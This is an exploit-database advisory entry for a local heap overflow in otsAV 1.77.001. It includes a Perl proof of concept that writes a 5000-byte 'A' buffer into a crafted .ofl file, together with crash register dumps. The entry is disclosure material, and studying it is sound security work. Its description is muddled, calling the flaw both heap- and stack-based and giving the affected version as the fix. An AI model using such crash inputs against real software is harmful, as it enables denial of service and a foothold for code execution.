otsAV 1.77.001 (.ofl File) Local Heap Overflow PoC

vendor:

otsAV

by:

HACK4LOVE

9,3

CVSS

HIGH

Heap Overflow

119

CWE

Product Name: otsAV

Affected Version From: 1.77.001

Affected Version To: 1.77.001

Patch Exists: YES

Related CWE: N/A

CPE: otsAV

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows

2009

otsAV 1.77.001 (.ofl File) Local Heap Overflow PoC

A local heap overflow vulnerability exists in otsAV 1.77.001 when a specially crafted .ofl file is opened. This can be exploited to cause a stack-based buffer overflow by corrupting the heap memory. Successful exploitation may allow execution of arbitrary code.

Mitigation:

Upgrade to the latest version of otsAV 1.77.001

Source

Exploit-DB raw data:

#!/usr/bin/perl
# Found By :: HACK4LOVE
# otsAV 1.77.001 (.ofl File) Local Heap Overflow PoC
# http://x.download.otszone.com/static/otsavfreesetup.exe
########################################################################################
##EAX 0123BB48
##ECX 01130210
##EDX 01130160
##EBX 41414141
##ESP 0012F22C
##EBP 0012F448
##ESI 0123BB40
##EDI 41414141
##EIP 7C91B3FB ntdll.7C91B3FB
#######################################################################################
##Thanks for shar7abel elsafa7\linuxX\and all 3asfh team$$$$$$$$$$$$$
########################################################################################
my $crash="\x41" x 5000;
open(myfile,'>>hack4love.OFL');
print myfile $crash;
########################################################################################

# milw0rm.com [2009-07-22]